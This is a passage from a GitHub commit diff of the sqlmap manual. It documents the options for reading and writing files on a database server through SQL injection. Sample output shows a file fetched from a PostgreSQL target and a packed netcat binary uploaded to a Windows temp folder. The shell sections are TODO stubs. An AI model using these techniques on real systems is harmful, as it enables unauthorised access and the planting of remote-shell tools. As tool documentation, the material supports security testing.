You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
@@ -3950,16 +3950,120 @@ <H3>Read a file from the back-end DBMS file system</H3>
3950
3950
3951
3951
<P>Option: <CODE>--read-file</CODE></P>
3952
3952
3953
-
<P>This paragraph will be written for sqlmap 0.7 stable version, refer to the white paper
3954
-
<AHREF="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf">Advanced SQL injection to operating system full control</A> for the moment.</P>
3953
+
<P>It is possible to retrieve the content of files from the underlying file
3954
+
system when the back-end database management is system is either MySQL,
3955
+
PostgreSQL or Microsoft SQL Server.
3956
+
The file specified can be either a text or a binary file, sqlmap will
3957
+
handle either cases automatically.</P>
3958
+
3959
+
<P>The techniques implemented are detailed on the white paper
3960
+
<AHREF="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf">Advanced SQL injection to operating system full control</A>.</P>
3961
+
3962
+
<P>Example on a <B>PostgreSQL 8.3.5</B> target:</P>
[hh:mm:22] [DEBUG] performed 203 queries in 18 seconds
4012
+
[hh:mm:22] [DEBUG] cleaning up the database management system
4013
+
[hh:mm:22] [DEBUG] removing support tables
4014
+
[hh:mm:22] [DEBUG] query: DROP TABLE sqlmapfile
4015
+
C:/example.txt file saved to: '/home/inquis/sqlmap/output/192.168.1.121/files/C__example.txt'
4016
+
4017
+
[hh:mm:22] [INFO] Fetched data logged to text files under '/home/inquis/sqlmap/output/192.168.1.121'
4018
+
4019
+
$ cat output/192.168.1.121/files/C__example.txt
4020
+
This is a text file
4021
+
</PRE>
4022
+
</CODE></BLOCKQUOTE>
4023
+
</P>
3955
4024
3956
4025
3957
4026
<H3>Write a local file on the back-end DBMS file system</H3>
3958
4027
3959
4028
<P>Options: <CODE>--write-file</CODE> and <CODE>--dest-file</CODE></P>
3960
4029
3961
-
<P>This paragraph will be written for sqlmap 0.7 stable version, refer to the white paper
3962
-
<AHREF="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf">Advanced SQL injection to operating system full control</A> for the moment.</P>
4030
+
<P>It is possible to upload a local file to the underlying file system when
4031
+
the back-end database management is system is either MySQL, PostgreSQL or
4032
+
Microsoft SQL Server.
4033
+
The file specified can be either a text or a binary file, sqlmap will
4034
+
handle either cases automatically.</P>
4035
+
4036
+
<P>The techniques implemented are detailed on the white paper
4037
+
<AHREF="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf">Advanced SQL injection to operating system full control</A>.</P>
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
4050
+
back-end DBMS: MySQL >= 5.0.0
4051
+
4052
+
[01:12:29] [INFO] testing stacked queries support on parameter 'id'
4053
+
[01:12:29] [INFO] detecting back-end DBMS version from its banner
4054
+
[01:12:29] [INFO] retrieved: 5.0.67
4055
+
[01:12:36] [INFO] the web application supports stacked queries on parameter 'id'
4056
+
[01:12:36] [INFO] fingerprinting the back-end DBMS operating system
4057
+
[01:12:36] [INFO] retrieved: C
4058
+
[01:12:36] [INFO] the back-end DBMS operating system is Windows
4059
+
do you want confirmation that the file 'C:/WINDOWS/Temp/nc.exe' has been successfully
4060
+
written on the back-end DBMS file system? [Y/n] y
4061
+
[01:12:52] [INFO] retrieved: 31744
4062
+
[01:12:52] [INFO] the file has been successfully written and its size is 31744 bytes, same
4063
+
size as the local file '/home/inquis/software/netcat/nc.exe.packed'
4064
+
</PRE>
4065
+
</CODE></BLOCKQUOTE>
4066
+
</P>
3963
4067
3964
4068
3965
4069
<H2><ANAME="ss5.9">5.9</A><AHREF="#toc5.9">Operating system access</A>
@@ -3969,40 +4073,50 @@ <H3>Execute an operating system command</H3>
3969
4073
3970
4074
<P>Option: <CODE>--os-cmd</CODE></P>
3971
4075
3972
-
<P>This paragraph will be written for sqlmap 0.7 stable version, refer to the white paper
3973
-
<AHREF="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf">Advanced SQL injection to operating system full control</A> for the moment.</P>
4076
+
<P>TODO</P>
4077
+
4078
+
<P>The techniques implemented are detailed on the white paper
4079
+
<AHREF="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf">Advanced SQL injection to operating system full control</A>.</P>
3974
4080
3975
4081
3976
4082
<H3>Prompt for an interactive operating system shell</H3>
3977
4083
3978
4084
<P>Option: <CODE>--os-shell</CODE></P>
3979
4085
3980
-
<P>This paragraph will be written for sqlmap 0.7 stable version, refer to the white paper
3981
-
<AHREF="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf">Advanced SQL injection to operating system full control</A> for the moment.</P>
4086
+
<P>TODO</P>
4087
+
4088
+
<P>The techniques implemented are detailed on the white paper
4089
+
<AHREF="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf">Advanced SQL injection to operating system full control</A>.</P>
3982
4090
3983
4091
3984
4092
<H3>Prompt for an out-of-band shell, meterpreter or VNC</H3>
3985
4093
3986
4094
<P>Options: <CODE>--os-pwn</CODE>, <CODE>--priv-esc</CODE>, <CODE>--msf-path</CODE> and <CODE>--tmp-path</CODE></P>
3987
4095
3988
-
<P>This paragraph will be written for sqlmap 0.7 stable version, refer to the white paper
3989
-
<AHREF="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf">Advanced SQL injection to operating system full control</A> for the moment.</P>
4096
+
<P>TODO</P>
4097
+
4098
+
<P>The techniques implemented are detailed on the white paper
4099
+
<AHREF="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf">Advanced SQL injection to operating system full control</A>.</P>
3990
4100
3991
4101
3992
4102
<H3>One click prompt for an out-of-band shell, meterpreter or VNC</H3>
3993
4103
3994
4104
<P>Options: <CODE>--os-smbrelay</CODE>, <CODE>--priv-esc</CODE> and <CODE>--msf-path</CODE></P>
3995
4105
3996
-
<P>This paragraph will be written for sqlmap 0.7 stable version, refer to the white paper
3997
-
<AHREF="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf">Advanced SQL injection to operating system full control</A> for the moment.</P>
4106
+
<P>TODO</P>
4107
+
4108
+
<P>The techniques implemented are detailed on the white paper
4109
+
<AHREF="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf">Advanced SQL injection to operating system full control</A>.</P>
<P>Options: <CODE>--os-bof</CODE>, <CODE>--priv-esc</CODE> and <CODE>--msf-path</CODE></P>
4003
4115
4004
-
<P>This paragraph will be written for sqlmap 0.7 stable version, refer to the white paper
4005
-
<AHREF="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf">Advanced SQL injection to operating system full control</A> for the moment.</P>
4116
+
<P>TODO</P>
4117
+
4118
+
<P>The techniques implemented are detailed on the white paper
4119
+
<AHREF="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf">Advanced SQL injection to operating system full control</A>.</P>
0 commit comments